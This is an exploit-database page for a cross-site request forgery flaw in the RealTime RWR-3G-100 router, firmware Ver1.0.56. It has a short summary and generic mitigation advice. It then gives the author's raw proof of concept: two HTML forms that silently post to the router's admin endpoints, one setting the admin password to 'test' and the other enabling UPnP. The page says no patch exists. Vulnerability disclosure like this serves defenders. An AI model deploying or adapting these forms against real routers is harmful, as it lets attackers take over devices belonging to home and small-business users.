RealTime RWR-3G-100 Router Cross-Site Request Forgery (Change Admin Password)

vendor:

RWR-3G-100 Router

by:

Touhid M.Shaikh

8,8

CVSS

HIGH

Cross-Site Request Forgery

352

CWE

Product Name: RWR-3G-100 Router

Affected Version From: Ver1.0.56

Affected Version To: Ver1.0.56

Patch Exists: NO

Related CWE: N/A

CPE: h:realtime:rwr-3g-100_router

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2017

RealTime RWR-3G-100 Router Cross-Site Request Forgery (Change Admin Password)

This exploit allows an attacker to change the admin password of RealTime RWR-3G-100 Router by sending a malicious request to the router. The malicious request is sent using a form with the username and password fields. The form is submitted to the router's IP address with the action set to 'goform/formPasswordSetup'. The attacker can then set the new password to whatever they want.

Mitigation:

The router should be configured to only accept requests from trusted sources. Additionally, the router should be configured to use strong passwords and two-factor authentication.

Source

Exploit-DB raw data:

<!--
# Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery
(Change Admin Password)
# Date: 13 Aug, 2017
# Vendor Homepage : http://www.rtsindia.com/
# Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd.
# Firmware Version : Ver1.0.56
# Exploit Author: Touhid M.Shaikh
# Contact: https://github.com/touhidshaikh
# Website: http://touhidshaikh.com/


===================
Product Description
===================
Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides
Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB
Dongle to get connected to Broadband/ Optionally Uses Wired Broadband
connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and
Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for
Multiple Users to get connected to Broadband. Small & Sleek Portable
Router, Easy to Install & Manage.
-->



<!-- CHANGE ADMIN PASSWORD to test-->
<form action=http://192.168.1.1/goform/formPasswordSetup method=POST
name="password">
    <input type="text" name="username" value="admin">
    <input type="password" name="newpass" value="test">
    <input type="password" name="confpass" value="test">
    <input type="hidden" value="/status.asp" name="submit-url">
    <input type="submit" value="Apply Changes" name="save">
  <input type="reset" value="  Reset  " name="reset" id="password Reset">
</form>
<!-- CHANGE ADMIN PASSWORD Ends here-->


<!---Enable The UPNP Service-->
<form action=http://192.168.1.1/goform/formUpnpSetup method=POST
name="upnpSetup">
  <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes"
checked>
  <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" >

<!--
  <input type="radio" name="avupnpfunction" id="avupnpfunctiony"
value="yes" checked>
  <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no"
>
-->
  <input type="submit" value="Apply Changes" name="save" id="upnp apply" >
  <input type="reset" value="  Reset  " name="reset" id="upnp Reset">
  <input type="hidden" value="/upnp.asp" name="submit-url">
</form>
<!---Enable The UPNP Service Ends here-->



<!--
======GREEtZ=====
my cool Broo and Pratik K.tjani
-->